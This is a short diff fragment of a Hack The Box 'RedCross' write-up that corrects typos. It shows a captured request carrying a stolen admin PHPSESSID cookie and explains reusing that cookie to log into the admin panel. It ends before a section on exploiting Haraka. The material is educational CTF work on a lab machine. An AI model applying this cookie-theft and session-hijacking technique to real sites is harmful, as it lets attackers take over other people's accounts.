Kyuu-Ji/htb-write-up/redcross/alternative-way-redcross.md

 GET /test.gif?cookie=PHPSESSID=4dcd7ecnqq39cgj492nk84p2k0;%20LANG=EN_US;%20SINCE=1612024348;%20LIMIT=10;%20DOMAIN=admin HTTP/1.1
 ```

-This response contains a session cookie and it tells that it comes from the domain _admin_ that is the subdomain _admin.redcross.htb_
+This response contains a session cookie and it tells that it comes from the domain _admin_ that is the subdomain _admin.redcross.htb_.
-By replacing the current _PHPSESSID cookie_ with _"4dcd7ecnqq39cgj492nk84p2k0"_, we get logged in and have access the to the admin panel.
+By replacing the current _PHPSESSID cookie_ with _"4dcd7ecnqq39cgj492nk84p2k0"_, we get logged in and have access to the admin panel.

 ### Exploiting Haraka on admin.redcross.htb